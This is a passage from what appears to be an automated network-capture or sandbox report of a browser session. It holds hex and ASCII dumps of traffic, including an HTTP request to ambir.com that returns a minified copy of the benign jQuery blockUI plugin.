                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: eb ce 4a ad 48 65 cd 7b de 78 d3 27 ed bc b6 d7 e0 fd 88 9a ed 40 8b 80 03 4c 77 3b 5a ce 52 65 ac 59 f4 cc f4 6c 5f 18 bc 69 15 a1 68 d2 e5 69 45 76 f5 c5 b3 27 e8 1d 21 3e 73 fb 9f dd 52 e4 01 5c ce 38 e3 a8 e6 83 f9 df d9 83 9f 91 3a 15 32 73 c6 d4 e9 7e 2f ce 75 1a e0 dc d9 df 07 b7 46 b1 7f 4f 31 8f a7 87 3b 7e 5a fb 31 df 87 61 9e 3d 9a 87 a5 9b f9 cc 93 21 cc d9 35 b2 e3 9a b4 bc 97 bc 4b 07 e9 7d 78 b4 66 8b 83 c5 32 6c 89 e6 66 60 a7 7c a9 43 2d 1d ff 00 e7 4f 4b cc f6 00 00 62 6c b3 43 38 4f 27 46 86 4b c1 bb 62 96 5f cb de 96 50 2a 75 89 32 81 eb d4 b9 de 5c 93 af fb 00 43 a1 5c 23 1b 60 5c cf 88 88 d5 8a 14 52 e2 9a b5 e7 89 d9 08 f4 b2 ad f6 9d 30 54 6e cc 71 70 99 9e 6a a5 10 85 16 d4 a5 1f 74 4f 7a 2d 93 45 f1 4f 4d a1 1c 9d a2 75 b6 8c 72
                                                                                                                                                                                              Data Ascii: JHe{x'@Lw;ZReYl_ihiEv'!>sR\8:2s~/uFO1;~Z1a=!5K}xf2lf`|C-OKblC8O'FKb_P*u2\C\#`\R0TnqpjtOz-EOMur
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 43 2c 42 b8 f8 49 eb 2f c3 9e 53 56 e5 71 6c 63 a6 e9 a2 92 09 91 04 1d 9d c1 57 de 20 fd d9 54 2d 16 4a 4f f4 f6 ff 00 7d 1d a1 46 2c b0 0e e3 23 db 4e 98 1d 4d 1d 57 f5 35 b9 7a 20 9c de ad 2b 88 d9 4f cd 09 04 5e 19 a3 b6 b1 96 93 1f a1 91 fe 4d 15 bb d4 d7 e7 15 34 1e 36 59 43 a0 b2 4a 22 a1 55 50 5f b7 1f 3b af fb ab a8 36 44 8e 86 69 1a 22 74 9d 35 41 ea 22 dd c3 58 a4 a2 ef 66 9c 98 df e3 05 2f f2 4f 53 24 94 31 11 e9 6d 58 dc 4e 37 f6 b6 68 38 6e 8f 2d cd 4a 1c e4 8e 70 74 d3 eb cb 24 45 90 2b 59 b0 66 a3 d3 f5 67 a6 30 ed 80 76 67 ac 53 5c df 04 94 6b 45 af 01 ba a8 ef 1c 18 82 50 15 a4 c3 5e 58 bb 92 f1 a3 aa 73 e8 0a 68 dc de a4 d1 62 6d 42 88 9b 72 7a 13 d8 55 00 c1 cf 4e b9 e9 7d cb a1 83 71 76 d6 69 96 09 3c 8f 20 40 c1 31 5d 37 1f b5 50 df
                                                                                                                                                                                              Data Ascii: C,BI/SVqlcW T-JO}F,#NMW5z +O^M46YCJ"UP_;6Di"t5A"Xf/OS$1mXN7h8n-Jpt$E+Yfg0vgS\kEP^XshbmBrzUN}qvi< @1]7P
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 6c ce d7 4d 50 70 a6 b4 f9 e3 b4 05 25 9b b9 c6 b7 bb 35 bb 33 93 63 1b d4 82 20 6e ec ef 5f b7 76 57 a8 d1 71 75 ee 71 10 02 e2 ab ec 4f b2 95 b1 ef e4 52 49 c0 86 2f bd b9 28 2e 7e e5 32 47 85 23 87 72 21 d6 16 eb de d6 6d eb 68 b5 66 e2 5c 5c 08 8d 37 90 e4 cd c1 94 9e ce 21 9a b8 3b 08 57 a5 2a eb 93 d2 59 07 41 41 28 a7 f9 16 4d 21 f5 15 fb 63 50 2c 89 fc b6 90 6b 94 4a e4 ff 00 d7 24 e1 5c b5 02 87 70 79 eb 5a d6 b5 24 a6 e3 95 2a c0 24 d2 c6 51 5f d8 e2 11 9f 6a c6 8e d5 0d a1 ec d6 9b a8 89 1c 24 a3 85 ae 58 22 a6 e0 8c 96 c8 12 9d bc 64 63 9c 3e 48 4e 65 55 52 62 3c 94 de 51 bb bd c0 87 6c 14 4c 0b 15 8b 92 bd 62 dd e1 6b 88 9c 7c b5 f9 68 a6 56 6e ad 65 58 a8 64 9d e2 bb 39 29 9c 87 00 d4 cf 8c fb ab aa e8 a2 ed c1 84 44 a4 74 a8 6d e6 95 da 62
                                                                                                                                                                                              Data Ascii: lMPp%53c n_vWquqORI/(.~2G#r!mhf\\7!;W*YAA(M!cP,kJ$\pyZ$*$Q_j$X"dc>HNeURb<QlLbk|hVneXd9)Dtmb
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 98 8d 74 c4 6b a5 a3 5d 31 1a e9 88 d7 4c 46 ba 62 3f 6e 98 8d 74 c4 6b a6 a3 5d 39 1a e1 dd e1 e3 b2 54 ec 11 7d 87 44 0d 47 66 53 51 e3 8a 34 a4 50 52 91 34 a4 55 0b 15 93 f4 ff 00 54 9f 99 5e 1c be b2 3e 48 7c ca e7 4d 14 21 27 e3 f7 72 d6 78 2d e4 5b 08 37 78 a9 5a 20 65 8c 76 0b 3f 7c 5d d6 f4 12 31 6c ca 98 01 00 3c be 97 89 c9 41 4a f9 b5 da 50 4d 1e ba d1 a8 27 35 30 96 ba c8 d7 59 1a 6f 36 91 1c 24 77 25 bc 6c d1 55 43 a8 a5 d9 69 0a 6c c1 39 6b 8a 3d db d1 5a 2b ac 1a ba c1 a8 f3 7b 40 06 ba b1 a8 65 8f 58 29 f1 8f 9a 98 6b f0 68 14 24 0a 14 4a 34 66 a5 1a 3b 02 8d 29 1a 51 a5 22 82 94 89 a1 8c 39 3c 4a 66 4b 1f f2 9c b0 ee 84 75 49 4b 76 51 ca 7b 0d 03 69 83 05 fb 6b d0 0d 3c 3e 9f 8a 17 5a e5 78 a4 a8 0f 5b a9 75 96 6c e5 fb b1 b6 24 26 6f 09
                                                                                                                                                                                              Data Ascii: tk]1LFb?ntk]9T}DGfSQ4PR4UT^>H|M!'rx-[7xZ ev?|]1l<AJPM'50Yo6$w%lUCil9k=Z+{@eX)kh$J4f;)Q"9<JfKuIKvQ{ik<>Zx[ul$&o
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 57 38 b8 93 4e d2 4d f6 93 c1 da a9 69 a9 a9 a3 d1 ac 83 41 7b eb a7 26 d5 28 ec 56 20 e2 03 51 fd 54 8a 36 ba 46 b8 34 5c 5e c2 ca 36 97 46 c2 e6 ba da 82 bf dd b3 ff 00 d4 8d 72 95 e4 94 66 c9 52 f7 31 a6 36 67 b1 02 fb 06 aa 9b 12 cd 4f 08 99 f1 3e 9c b0 81 99 ad b5 ce 97 e1 03 d1 d8 a9 31 69 ae 6d c1 a4 73 4f 37 8d 6b dd 3d c6 39 98 d9 18 48 20 e5 22 e3 4e 24 4a 25 12 89 44 ed f9 af cb 20 a6 74 51 fe 27 f0 47 ad 47 6a bc 69 ff 00 2d 92 fb 77 bd 91 8f 37 85 fa 4a 27 b8 66 0e 36 89 ee ef 6b 81 09 83 30 e5 6d 50 1d 9c 20 a5 8e 37 8d b6 0f b7 ed 34 2a e8 05 f5 d5 e0 2c 56 37 31 db 22 05 96 ed db f3 dd 67 d7 4b 15 28 e8 2e cc 7b 9a 50 d2 9a 94 9b f4 e9 ed fa 97 92 14 74 6f cc 4b 86 66 bb 97 98 a6 d2 c7 23 46 87 2b ce bc 7c 7d 0a 48 dc 33 0b 65 6d 8d ee 9c
                                                                                                                                                                                              Data Ascii: W8NMiA{&(V QT6F4\^6FrfR16gO>1imsO7k=9H "N$J%D tQ'GGji-w7J'f6k0mP 74*,V71"gK(.{PtoKf#F+|}H3em
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: c5 21 51 c3 bf 34 dc 3d a4 e6 bf 49 ba c3 e3 0d 2c 6c 6e 63 1f f6 6f ae ab 0c aa cd bf 09 18 61 90 70 40 d8 35 51 d5 c3 70 00 bc 57 f5 2a 69 65 c2 a1 99 b5 55 75 37 c9 c2 6e 6b 33 2e de 3e f5 0b 1b 21 a5 8c 38 b4 5b ed 7d 05 1e 14 c8 29 77 b3 14 92 42 f7 bd c1 d1 b5 d7 3c 2b 6d 27 89 62 f4 cc 82 69 32 b9 91 d1 c6 07 36 bb 76 f3 ac 2f 0d a3 a3 ae aa 64 13 49 10 7b a4 61 0e da 2e eb 0e 10 58 ce 33 2c d0 33 21 64 0c 70 d0 0b 86 dd ad b7 7a c3 f1 30 d0 db ef d5 92 39 ad 77 37 8d 7e e5 4b 43 7e 70 1c 7b d4 50 8f ea e0 ff 00 25 19 35 22 58 e5 87 3f 05 b7 07 5d 4f 31 2a 6a 52 2a 23 0e 89 91 c9 99 d9 db a8 f6 ae 35 26 69 e8 d8 68 66 3f 7a 2e 08 fd 9c a7 af ea d2 5a 7c 47 85 35 b8 a1 1f 11 d3 a8 f8 23 21 f5 9c 08 4f 93 08 3a 9b f1 66 77 73 4f 82 e5 ee 39 45 bd c7
                                                                                                                                                                                              Data Ascii: !Q4=I,lncoap@5QpW*ieUu7nk3.>!8[})wB<+m'bi26v/dI{a.X3,3!dpz09w7~KC~p{P%5"X?]O1*jR*#5&ihf?z.Z|G5#!O:fwsO9E
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: a4 cd 93 79 d6 de 4e 6c fd f6 5b d8 b1 f1 76 9f 5a a7 cd ae d6 ba c7 d6 a0 cb 63 6d 65 51 c7 6e 7a 84 d8 a2 ce c7 30 bd 93 b3 33 41 69 17 17 e3 d5 6e 83 11 22 37 e6 8e 7f 96 43 be c6 38 da 38 16 b7 52 9d d2 18 63 6b 03 a4 aa 6d f4 16 bf 06 c1 4b 4e 03 79 24 6e a2 ea 18 cc 9a 7f 38 6e 96 e8 4c 73 e6 a0 a9 82 a2 d1 1b 9d b9 0f 8b cc f5 47 5c 5f e4 da 4b ac 1a 5a 6a 1c 36 66 d4 ef 95 2d 20 bd ed d5 a1 a0 f3 db 5f 0d 38 9d 94 35 51 54 54 b3 8f 79 d5 a4 8e 82 e0 7a 01 54 d5 30 c6 f7 39 8d 7b 99 76 92 36 8b 85 59 0d f9 cd 8f 7a 78 3d 05 39 14 13 dc 3a d4 c4 f4 a0 c7 28 7b 0a ce de a5 3b 7a d6 57 26 22 42 3c 64 ad b3 3e 79 7b 65 77 d0 0b 91 44 f9 07 e8 70 bf 75 14 1c 43 78 9a 35 54 12 bb f1 1b 2a 48 d9 d3 72 aa 32 03 e4 b4 2a c9 1d 7e 57 2b 93 6b a8 ee 85 83 d8
                                                                                                                                                                                              Data Ascii: yNl[vZcmeQnz03Ain"7C88RckmKNy$n8nLsG\_KZj6f- _85QTTyzT09{v6Yzx=9:({;zW&"B<d>y{ewDpuCx5T*Hr2*~W+k
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 53 93 93 0c 90 b5 ed 32 30 1b 17 36 fa 8b f4 2d ca d4 65 71 69 63 1b 58 6c de 0d 88 e7 04 9c dd 20 71 5d 6e 7e a0 3e 28 da da 83 bf fe 75 f7 8e e4 6b a5 c3 65 f3 c7 22 a1 75 14 05 8d fc 89 93 3d 9d 6d 4d d1 45 1d ae 0d 45 14 7f 3d 83 55 c4 7c e6 3b d9 f3 c2 08 20 9a 9a ae 3a 17 0b a5 65 ed 4c 8c f3 ef 96 45 8f 94 68 c6 b7 50 de 7e 9f ac 6c 66 09 93 ac ca f2 8f 81 f6 8a 28 19 25 ad e3 11 75 86 6f d5 4f 63 a4 b3 9f 94 06 b4 5c 9b ac 1a 95 a4 71 1a b0 b0 7a 4d 97 fe 36 36 2c 0e 99 f9 76 da a8 2c 06 9d b9 9c 18 db d5 0d 5c 76 05 83 d3 3a 5b 91 91 b5 40 ba f7 b7 af 45 82 53 97 9b 80 df 94 8b dc 6d 0b 0b 31 55 c2 1a e7 34 3e e2 ce 17 1d c5 46 1b 1c f5 0e 6b d9 c6 36 eb 7f 09 e1 3e 8e a8 75 16 3b dd f4 81 04 10 fa d3 78 46 97 7b 17 d8 4b 1c 6e de b0 f5 be 46 fe
                                                                                                                                                                                              Data Ascii: S206-eqicXl q]n~>(uke"u=mMEE=U|; :eLEhP~lf(%uoOc\qzM66,v,\v:[@ESm1U4>Fk6>u;xF{KnF
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 31 ac 94 5e 74 5b 0e 0e 1f 4f 57 e9 38 42 42 e1 59 42 af 8b a2 c6 84 0c e2 a1 b1 3a 5a f2 50 94 b1 75 1c 5e 10 2f d0 52 bd 07 c5 45 97 8b 48 f5 fe 3e 07 df f8 a9 28 77 29 3f 91 de 09 8c 8a 2c 08 07 00 03 d2 3e aa dc 4b 40 ea 2b 57 37 c6 ec 65 51 7f 9d 55 ce 2e 8d 95 57 aa c6 a6 1e b0 97 50 b7 56 21 0d 38 ef 0c 45 d6 b3 40 b1 61 97 14 d5 99 53 9b 95 4a 27 f2 6d 23 bc cd cc 50 64 6e b2 e3 86 55 bf a1 f9 a5 9d 7a 01 ef 35 eb 7e b3 dc 25 ee 33 89 1e 96 7e 9a 34 80 67 9d 98 c5 7a cd 35 0b 7d 8f f1 69 fe 99 65 84 cc 84 51 a6 d8 b4 e9 b6 d0 a0 11 10 34 71 10 1e 66 b0 5d 20 49 61 68 68 be c4 d9 91 b2 cf e6 2b 2d 16 3b 14 ba 1d 23 27 77 dc d5 de 03 04 c6 64 2d 34 11 c2 3b 30 48 70 01 7c 68 d7 5e 1f 45 7e 93 84 6d 6d d9 ad d0 a1 05 e4 aa 61 4c 22 fa c5 55 82 e1 43
                                                                                                                                                                                              Data Ascii: 1^t[OW8BBYB:ZPu^/REH>(w)?,>K@+W7eQU.WPV!8E@aSJ'm#PdnUz5~%3~4gz5}ieQ4qf] Iahh+-;#'wd-4;0Hp|h^E~mmaL"UC


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              66192.168.2.549799141.193.213.114431976C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-11-20 20:28:24 UTC1675OUTGET /wp-content/cache/wpo-minify/1732127092/assets/wpo-minify-header-aead31c6.min.js HTTP/1.1
                                                                                                                                                                                              Host: ambir.com
                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                              Cookie: sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-20%2020%3A28%3A20%7C%7C%7Cep%3Dhttps%3A%2F%2Fambir.com%2Fambir-card-scanners%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F117.0.0.0%20Safari%2F53 [TRUNCATED]
                                                                                                                                                                                              2024-11-20 20:28:25 UTC490INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Wed, 20 Nov 2024 20:28:25 GMT
                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                              Last-Modified: Wed, 20 Nov 2024 18:27:07 GMT
                                                                                                                                                                                              ETag: W/"673e29fb-4873"
                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                              Age: 6835
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8e5b2fb09e1f42b0-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              2024-11-20 20:28:25 UTC879INData Raw: 34 38 37 33 0d 0a 0a 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 62 6c 6f 63 6b 55 49 20 70 6c 75 67 69 6e 0a 20 2a 20 56 65 72 73 69 6f 6e 20 32 2e 37 30 2e 30 2d 32 30 31 34 2e 31 31 2e 32 33 0a 20 2a 20 52 65 71 75 69 72 65 73 20 6a 51 75 65 72 79 20 76 31 2e 37 20 6f 72 20 6c 61 74 65 72 0a 20 2a 0a 20 2a 20 45 78 61 6d 70 6c 65 73 20 61 74 3a 20 68 74 74 70 3a 2f 2f 6d 61 6c 73 75 70 2e 63 6f 6d 2f 6a 71 75 65 72 79 2f 62 6c 6f 63 6b 2f 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 37 2d 32 30 31 33 20 4d 2e 20 41 6c 73 75 70 0a 20 2a 20 44 75 61 6c 20 6c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 61 6e 64 20 47 50 4c 20 6c 69 63 65 6e 73 65 73 3a 0a 20 2a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 70 65 6e 73 6f 75
                                                                                                                                                                                              Data Ascii: 4873/*! * jQuery blockUI plugin * Version 2.70.0-2014.11.23 * Requires jQuery v1.7 or later * * Examples at: http://malsup.com/jquery/block/ * Copyright (c) 2007-2013 M. Alsup * Dual licensed under the MIT and GPL licenses: * http://www.opensou
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 22 3e 3c 2f 64 69 76 3e 27 29 3b 74 26 26 73 2e 61 70 70 65 6e 64 28 22 3c 68 31 3e 22 2b 74 2b 22 3c 2f 68 31 3e 22 29 2c 6f 26 26 73 2e 61 70 70 65 6e 64 28 22 3c 68 32 3e 22 2b 6f 2b 22 3c 2f 68 32 3e 22 29 2c 6e 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 6e 3d 33 65 33 29 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 74 3d 74 7c 7c 7b 7d 2c 65 2e 62 6c 6f 63 6b 55 49 28 7b 6d 65 73 73 61 67 65 3a 73 2c 66 61 64 65 49 6e 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 66 61 64 65 49 6e 3f 74 2e 66 61 64 65 49 6e 3a 37 30 30 2c 66 61 64 65 4f 75 74 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 66 61 64 65 4f 75 74 3f 74 2e 66 61 64 65 4f 75 74 3a 31 65 33 2c 74 69 6d 65 6f 75 74 3a 22 75 6e 64 65
                                                                                                                                                                                              Data Ascii: "></div>');t&&s.append("<h1>"+t+"</h1>"),o&&s.append("<h2>"+o+"</h2>"),n===undefined&&(n=3e3);var l=function(t){t=t||{},e.blockUI({message:s,fadeIn:"undefined"!=typeof t.fadeIn?t.fadeIn:700,fadeOut:"undefined"!=typeof t.fadeOut?t.fadeOut:1e3,timeout:"unde
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 6f 70 61 63 69 74 79 3a 2e 36 2c 63 75 72 73 6f 72 3a 22 77 61 69 74 22 7d 2c 63 75 72 73 6f 72 52 65 73 65 74 3a 22 64 65 66 61 75 6c 74 22 2c 67 72 6f 77 6c 43 53 53 3a 7b 77 69 64 74 68 3a 22 33 35 30 70 78 22 2c 74 6f 70 3a 22 31 30 70 78 22 2c 6c 65 66 74 3a 22 22 2c 72 69 67 68 74 3a 22 31 30 70 78 22 2c 62 6f 72 64 65 72 3a 22 6e 6f 6e 65 22 2c 70 61 64 64 69 6e 67 3a 22 35 70 78 22 2c 6f 70 61 63 69 74 79 3a 2e 36 2c 63 75 72 73 6f 72 3a 22 64 65 66 61 75 6c 74 22 2c 63 6f 6c 6f 72 3a 22 23 66 66 66 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 23 30 30 30 22 2c 22 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 31 30 70 78 22 2c 22 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 22 3a 22 31 30 70 78 22 2c
                                                                                                                                                                                              Data Ascii: opacity:.6,cursor:"wait"},cursorReset:"default",growlCSS:{width:"350px",top:"10px",left:"",right:"10px",border:"none",padding:"5px",opacity:.6,cursor:"default",color:"#fff",backgroundColor:"#000","-webkit-border-radius":"10px","-moz-border-radius":"10px",
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 6d 2e 70 61 72 65 6e 74 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 79 29 7d 65 28 64 29 2e 64 61 74 61 28 22 62 6c 6f 63 6b 55 49 2e 6f 6e 55 6e 62 6c 6f 63 6b 22 2c 63 2e 6f 6e 55 6e 62 6c 6f 63 6b 29 3b 76 61 72 20 67 2c 76 2c 49 2c 77 2c 55 3d 63 2e 62 61 73 65 5a 3b 67 3d 6f 7c 7c 63 2e 66 6f 72 63 65 49 66 72 61 6d 65 3f 65 28 27 3c 69 66 72 61 6d 65 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 55 49 22 20 73 74 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 27 2b 55 2b 2b 2b 27 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 77 69 64 74 68 3a 31 30 30 25 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30
                                                                                                                                                                                              Data Ascii: m.parent.removeChild(y)}e(d).data("blockUI.onUnblock",c.onUnblock);var g,v,I,w,U=c.baseZ;g=o||c.forceIframe?e('<iframe class="blockUI" style="z-index:'+U+++';display:none;border:none;margin:0;padding:0;position:absolute;width:100%;height:100%;top:0;left:0
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 27 2b 28 55 2b 31 30 29 2b 27 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 22 3e 3c 2f 64 69 76 3e 27 3a 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6c 6f 63 6b 55 49 20 27 2b 63 2e 62 6c 6f 63 6b 4d 73 67 43 6c 61 73 73 2b 27 20 62 6c 6f 63 6b 45 6c 65 6d 65 6e 74 22 20 73 74 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 27 2b 28 55 2b 31 30 29 2b 27 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 22 3e 3c 2f 64 69 76 3e 27 2c 49 3d 65 28 77 29 2c 6b 26 26 28 63 2e 74 68 65 6d 65 3f 28 49 2e 63 73 73 28 62 29 2c 49 2e 61 64 64 43 6c 61 73 73 28 22 75 69 2d 77 69 64 67 65 74 2d 63 6f 6e 74 65 6e 74 22 29 29 3a 49 2e 63 73 73 28 75 29 29 2c 63
                                                                                                                                                                                              Data Ascii: yle="z-index:'+(U+10)+';display:none;position:fixed"></div>':'<div class="blockUI '+c.blockMsgClass+' blockElement" style="z-index:'+(U+10)+';display:none;position:absolute"></div>',I=e(w),k&&(c.theme?(I.css(b),I.addClass("ui-widget-content")):I.css(u)),c
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 65 74 45 78 70 72 65 73 73 69 6f 6e 28 22 74 6f 70 22 2c 27 28 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 20 7c 7c 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 29 20 2f 20 32 20 2d 20 28 74 68 69 73 2e 6f 66 66 73 65 74 48 65 69 67 68 74 20 2f 20 32 29 20 2b 20 28 62 6c 61 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 20 3f 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 73 63 72 6f 6c 6c 54 6f 70 20 3a 20 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 73 63 72 6f 6c 6c 54 6f 70 29 20 2b 20 22 70 78 22 27 29 2c 6f 2e 6d 61 72 67 69 6e 54 6f 70 3d 30 3b 65 6c 73
                                                                                                                                                                                              Data Ascii: etExpression("top",'(document.documentElement.clientHeight || document.body.clientHeight) / 2 - (this.offsetHeight / 2) + (blah = document.documentElement.scrollTop ? document.documentElement.scrollTop : document.body.scrollTop) + "px"'),o.marginTop=0;els
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 6d 65 6f 75 74 28 66 29 2c 61 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 62 6c 6f 63 6b 55 49 2e 74 69 6d 65 6f 75 74 22 29 29 2c 6f 3d 65 2e 65 78 74 65 6e 64 28 7b 7d 2c 65 2e 62 6c 6f 63 6b 55 49 2e 64 65 66 61 75 6c 74 73 2c 6f 7c 7c 7b 7d 29 2c 72 28 30 2c 74 2c 6f 29 2c 6e 75 6c 6c 3d 3d 3d 6f 2e 6f 6e 55 6e 62 6c 6f 63 6b 26 26 28 6f 2e 6f 6e 55 6e 62 6c 6f 63 6b 3d 61 2e 64 61 74 61 28 22 62 6c 6f 63 6b 55 49 2e 6f 6e 55 6e 62 6c 6f 63 6b 22 29 2c 61 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 62 6c 6f 63 6b 55 49 2e 6f 6e 55 6e 62 6c 6f 63 6b 22 29 29 2c 69 3d 64 3f 65 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 63 68 69 6c 64 72 65 6e 28 29 2e 66 69 6c 74 65 72 28 22 2e 62 6c 6f 63 6b 55 49 22 29 2e 61 64 64 28 22 62 6f 64 79 20 3e 20 2e 62 6c 6f 63
                                                                                                                                                                                              Data Ascii: meout(f),a.removeData("blockUI.timeout")),o=e.extend({},e.blockUI.defaults,o||{}),r(0,t,o),null===o.onUnblock&&(o.onUnblock=a.data("blockUI.onUnblock"),a.removeData("blockUI.onUnblock")),i=d?e(document.body).children().filter(".blockUI").add("body > .bloc
                                                                                                                                                                                              2024-11-20 20:28:25 UTC1369INData Raw: 54 61 62 4b 65 79 29 7b 76 61 72 20 6f 3d 6c 2c 6e 3d 21 74 2e 73 68 69 66 74 4b 65 79 26 26 74 2e 74 61 72 67 65 74 3d 3d 3d 6f 5b 6f 2e 6c 65 6e 67 74 68 2d 31 5d 2c 69 3d 74 2e 73 68 69 66 74 4b 65 79 26 26 74 2e 74 61 72 67 65 74 3d 3d 3d 6f 5b 30 5d 3b 69 66 28 6e 7c 7c 69 29 72 65 74 75 72 6e 20 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 28 69 29 7d 2c 31 30 29 2c 21 31 7d 76 61 72 20 64 3d 74 2e 64 61 74 61 2c 61 3d 65 28 74 2e 74 61 72 67 65 74 29 3b 72 65 74 75 72 6e 20 61 2e 68 61 73 43 6c 61 73 73 28 22 62 6c 6f 63 6b 4f 76 65 72 6c 61 79 22 29 26 26 64 2e 6f 6e 4f 76 65 72 6c 61 79 43 6c 69 63 6b 26 26 64 2e 6f 6e 4f 76 65 72 6c 61 79 43 6c 69 63 6b 28 74 29 2c 61 2e 70 61 72 65 6e 74 73 28 22 64 69 76 2e 22 2b 64 2e
